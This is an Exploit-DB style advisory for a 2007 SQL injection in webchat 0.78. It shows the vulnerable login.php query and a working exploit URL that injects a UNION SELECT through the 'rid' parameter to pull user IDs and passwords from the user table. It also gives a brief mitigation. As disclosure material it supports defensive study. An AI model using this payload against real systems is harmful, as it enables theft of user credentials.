webchat 0.78 SQL Injection

vendor:

by:

r00t

N/A

CVSS

N/A

SQL Injection

CWE

Product Name:

Affected Version From: webchat 0.78

Affected Version To: webchat 0.78

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The vulnerability exists in the login.php file of webchat 0.78. By manipulating the 'rid' parameter in the URL, an attacker can perform a SQL injection attack to extract sensitive information from the user table.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented in the code to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################################################################
#
#               [webchat 0.78]
#
# Class:     SQL Injection
# Published  28/06/2007
# Remote:    Yes
# Critical   Level : Dangerous
# Site:      http://sourceforge.net/projects/webdev-webchat/
# Download:  http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author:    r00t
#########################################################################


               Vulnerable code:
               login.php
======================================================
<?
       $q = new DB_Chat;
       $q->query("select * from room where rid='$rid'");
       if ($q->next_record()) {
?>
=======================================================

               Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

               Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================

# milw0rm.com [2007-06-28]